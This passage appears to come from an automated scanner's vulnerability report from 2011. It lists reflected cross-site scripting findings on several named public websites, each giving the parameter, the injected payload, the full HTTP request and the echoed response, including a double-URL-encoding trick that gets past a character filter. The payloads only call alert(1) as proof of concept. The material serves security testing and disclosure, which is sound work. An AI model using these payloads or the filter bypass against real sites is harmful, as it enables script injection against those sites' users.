The value of the bean request parameter is copied into the HTML document as plain text between tags. The payload 7e534<img%20src%3da%20onerror%3dalert(1)>39d24d73cff was submitted in the bean parameter. This input was echoed as 7e534<img src=a onerror=alert(1)>39d24d73cff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
<!-- ADF Lightbox Framework Loaded @ {ts '2011-02-26 18:16:29'} --> <script type='text/javascript' s ...[SNIP]... </script> The Bean: twitterService7e534<img src=a onerror=alert(1)>39d24d73cff with method: buildUtilityTweetHTML is not accessible remotely via Ajax Proxy.
The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 998c7<img%20src%3da%20onerror%3dalert(1)>36e6591e379 was submitted in the method parameter. This input was echoed as 998c7<img src=a onerror=alert(1)>36e6591e379 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
<!-- ADF Lightbox Framework Loaded @ {ts '2011-02-26 18:16:36'} --> <script type='text/javascript' s ...[SNIP]... </script> The Bean: twitterService with method: buildUtilityTweetHTML998c7<img src=a onerror=alert(1)>36e6591e379 is not accessible remotely via Ajax Proxy.
3.59. http://www.prchecker.info/check_page_rank.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.prchecker.info
Path:
/check_page_rank.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27f50"><script>alert(1)</script>1c5367c1276627aae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /check_page_rank.php/27f50"><script>alert(1)</script>1c5367c1276627aae?action=docheck&urlo=http%3A%2F%2Fcloudscan.us&submit=Check+PR HTTP/1.1 Host: www.prchecker.info Proxy-Connection: keep-alive Referer: http://www.prchecker.info/check_page_rank.php Cache-Control: max-age=0 Origin: http://www.prchecker.info Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=d8830cccd52d81fdcc1aa4a449836fbd
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 01:34:46 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 27444
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us"> <html> <title> ...[SNIP]... <form action="/check_page_rank.php/27f50"><script>alert(1)</script>1c5367c1276627aae" method="post"> ...[SNIP]...
The value of the urlo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82917"%20style%3dx%3aexpression(alert(1))%20363f71d7529b64269 was submitted in the urlo parameter. This input was echoed as 82917\" style=x:expression(alert(1)) 363f71d7529b64269 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /check_page_rank.php?action=docheck&urlo=http%3A%2F%2Fcloudscan.us82917"%20style%3dx%3aexpression(alert(1))%20363f71d7529b64269&submit=Check+PR HTTP/1.1 Host: www.prchecker.info Proxy-Connection: keep-alive Referer: http://www.prchecker.info/check_page_rank.php Cache-Control: max-age=0 Origin: http://www.prchecker.info Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=d8830cccd52d81fdcc1aa4a449836fbd
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 01:34:45 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 27543
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8e9b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1374672bac was submitted in the REST URL parameter 3. This input was echoed as c8e9b</script><script>alert(1)</script>a1374672bac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /Portfolio/Trades-and-Exhibits/id-24c8e9b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1374672bac/page-1/ HTTP/1.1 Host: www.sti-cs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:18:55 GMT Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html Content-Length: 14545
...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Trades and Exhibits :: STI - Creative Services</title>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98f92%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4b72cc82878 was submitted in the REST URL parameter 3. This input was echoed as 98f92</script><script>alert(1)</script>4b72cc82878 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /Portfolio/Trades-and-Exhibits/id-2598f92%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4b72cc82878/page-1/ HTTP/1.1 Host: www.sti-cs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:19:02 GMT Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html Content-Length: 14545
...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Trades and Exhibits :: STI - Creative Services</title>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e625%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7ccd8e3bb1d was submitted in the REST URL parameter 3. This input was echoed as 4e625</script><script>alert(1)</script>7ccd8e3bb1d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /Portfolio/Trades-and-Exhibits/id-74e625%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7ccd8e3bb1d/page-1/ HTTP/1.1 Host: www.sti-cs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:18:51 GMT Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html Content-Length: 14544
...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Trades and Exhibits :: STI - Creative Services</title>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 291e9'-alert(1)-'67bdd5c1b7a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /assets/css/print.css291e9'-alert(1)-'67bdd5c1b7a?20101008 HTTP/1.1 Host: www.watchmouse.com Proxy-Connection: keep-alive Referer: http://www.watchmouse.com/en/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 404 Not Found Date: Sun, 27 Feb 2011 01:37:31 GMT Server: Apache/2.2.9 (Debian) X-Powered-By: PHP/5.2.6-1+lenny9 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache ETag: "0-en-23e31667bc72ad97513a3b9a533cce89" Content-Language: en P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 13816
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head><tit ...[SNIP]... <![CDATA[ function checkReferrer(){ var vref_string = encodeURIComponent('173.193.214.243::0::http://www.watchmouse.com/en/::print.css291e9'-alert(1)-'67bdd5c1b7a?20101008'); var serverRef = encodeURIComponent('http://www.watchmouse.com/en/'); if(document && document.referrer){ jsRef = encodeURIComponent(document.referrer); }else{ jsRef = '';
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8adcd'-alert(1)-'6e92d57bec8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /assets/css/screen.css8adcd'-alert(1)-'6e92d57bec8?20101008 HTTP/1.1 Host: www.watchmouse.com Proxy-Connection: keep-alive Referer: http://www.watchmouse.com/en/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 404 Not Found Date: Sun, 27 Feb 2011 01:37:32 GMT Server: Apache/2.2.9 (Debian) X-Powered-By: PHP/5.2.6-1+lenny9 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache ETag: "0-en-b162fa23d063abe27d39c6c2ca59435b" Content-Language: en P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 13826
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head><tit ...[SNIP]... <![CDATA[ function checkReferrer(){ var vref_string = encodeURIComponent('173.193.214.243::0::http://www.watchmouse.com/en/::screen.css8adcd'-alert(1)-'6e92d57bec8?20101008'); var serverRef = encodeURIComponent('http://www.watchmouse.com/en/'); if(document && document.referrer){ jsRef = encodeURIComponent(document.referrer); }else{ jsRef = '';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c623'-alert(1)-'83954da49c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en3c623'-alert(1)-'83954da49c1/ HTTP/1.1 Host: www.watchmouse.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 404 Not Found Date: Sun, 27 Feb 2011 01:36:45 GMT Server: Apache/2.2.9 (Debian) X-Powered-By: PHP/5.2.6-1+lenny9 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache ETag: "0-en-014c46aed482ac19cb678104562d803c" Content-Language: en P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 13508
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head><tit ...[SNIP]... <![CDATA[ function checkReferrer(){ var vref_string = encodeURIComponent('173.193.214.243::0::::en3c623'-alert(1)-'83954da49c1'); var serverRef = encodeURIComponent(''); if(document && document.referrer){ jsRef = encodeURIComponent(document.referrer); }else{ jsRef = ''; } requestParams = 'vjsRef='+jsRef ...[SNIP]...
3.67. http://www.watchmouse.com/en/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.watchmouse.com
Path:
/en/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41203'-alert(1)-'2f529518186 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/?41203'-alert(1)-'2f529518186=1 HTTP/1.1 Host: www.watchmouse.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 01:36:29 GMT Server: Apache/2.2.9 (Debian) X-Powered-By: PHP/5.2.6-1+lenny9 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache ETag: "0-en-fff3e345c354e49d8e0d897a110c3ceb" Content-Language: en P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 18498
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head><tit ...[SNIP]... <![CDATA[ function checkReferrer(){ var vref_string = encodeURIComponent('173.193.214.243::0::::?41203'-alert(1)-'2f529518186=1'); var serverRef = encodeURIComponent(''); if(document && document.referrer){ jsRef = encodeURIComponent(document.referrer); }else{ jsRef = ''; } requestParams = 'vjsRef='+jsR ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0d30'-alert(1)-'ef346e3dbf0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/api/checkreferrer.phpa0d30'-alert(1)-'ef346e3dbf0?vjsRef=&vref_string=173.193.214.243%3A%3A0%3A%3A%3A%3Aen&vserverRef= HTTP/1.1 Host: www.watchmouse.com Proxy-Connection: keep-alive Referer: http://www.watchmouse.com/en/ X-Requested-With: XMLHttpRequest Accept: text/html, */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=165779128.1298770635.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165779128.1798479609.1298770635.1298770635.1298770635.1; __utmc=165779128; __utmb=165779128.1.10.1298770635
Response
HTTP/1.1 404 Not Found Date: Sun, 27 Feb 2011 01:37:20 GMT Server: Apache/2.2.9 (Debian) X-Powered-By: PHP/5.2.6-1+lenny9 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache ETag: "0-en-f7f299238f15fb232758e7723cf59eb8" Content-Language: en P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 14505
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head><tit ...[SNIP]... <![CDATA[ function checkReferrer(){ var vref_string = encodeURIComponent('173.193.214.243::0::http://www.watchmouse.com/en/::checkreferrer.phpa0d30'-alert(1)-'ef346e3dbf0?vjsRef=&vref_string=173.193.214.243%3A%3A0%3A%3A%3A%3Aen&vserverRef='); var serverRef = encodeURIComponent('http://www.watchmouse.com/en/'); if(document && document.referrer){ jsRef = encode ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c2b5"%3b5abe0529ac9 was submitted in the REST URL parameter 2. This input was echoed as 5c2b5";5abe0529ac9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /media-player/en5c2b5"%3b5abe0529ac9 HTTP/1.1 Host: www.winamp.com Proxy-Connection: keep-alive Referer: http://forums.winamp.com/login.php?do=login Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828671740-New%7C1361900671740%3B%20s_nrgvo%3DNew%7C1361900671741%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/media-player%252526ot%25253DA%3B; countryCookie=US
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 17:45:19 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 46245
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... ryCode = "US"; var playerType = ""; var storeUrlGB = "http://shop.winamp.com/store/winamp/en_GB/buy/productID.103591500/quantity.1/ThemeID.1279300"; var storeBundleUrlGB = "null"; var urlLang = "en5c2b5";5abe0529ac9", osDectect = "Windows 7", dispLanguage = "en-us" , pageType = "", winampplayerFull = "http://download.nullsoft.com/winamp/client/winamp5601_full_emusic-7plus_", winampplayerLite = "http://download.nu ...[SNIP]...
The value of the ck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e233"><script>alert(1)</script>9397ad22b9d was submitted in the ck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software9e233"><script>alert(1)</script>9397ad22b9d&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22 HTTP/1.1 Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5090c"><script>alert(1)</script>1a96ced61b8 was submitted in the cm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k5090c"><script>alert(1)</script>1a96ced61b8&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22 HTTP/1.1 Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cmp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ba58"><script>alert(1)</script>d98038b851d was submitted in the cmp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=000008ba58"><script>alert(1)</script>d98038b851d&mkwid=sbqlaimsi_7690207419_432jmv5154/x22 HTTP/1.1 Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1af2a"><script>alert(1)</script>5ffbc7300df was submitted in the cr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google1af2a"><script>alert(1)</script>5ffbc7300df&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22 HTTP/1.1 Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the csr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d200c"><script>alert(1)</script>6c7450ed2d9 was submitted in the csr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117d200c"><script>alert(1)</script>6c7450ed2d9&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22 HTTP/1.1 Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the ct request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f22e7"><script>alert(1)</script>84e8fbf3eea was submitted in the ct parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GWf22e7"><script>alert(1)</script>84e8fbf3eea&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22 HTTP/1.1 Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the mkwid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdcaa"><script>alert(1)</script>9a515e2d34d was submitted in the mkwid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22fdcaa"><script>alert(1)</script>9a515e2d34d HTTP/1.1 Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml: ...[SNIP]... /iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22fdcaa"><script>alert(1)</script>9a515e2d34d"> ...[SNIP]...
3.77. https://www14.software.ibm.com/webapp/iwm/web/signup.do [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www14.software.ibm.com
Path:
/webapp/iwm/web/signup.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 439fe"><script>alert(1)</script>0ba8f26f2b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22&439fe"><script>alert(1)</script>0ba8f26f2b2=1 HTTP/1.1 Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the User-Agent HTTP header is copied into an HTML comment. The payload d3ae7--><script>alert(1)</script>b0977adf47b was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
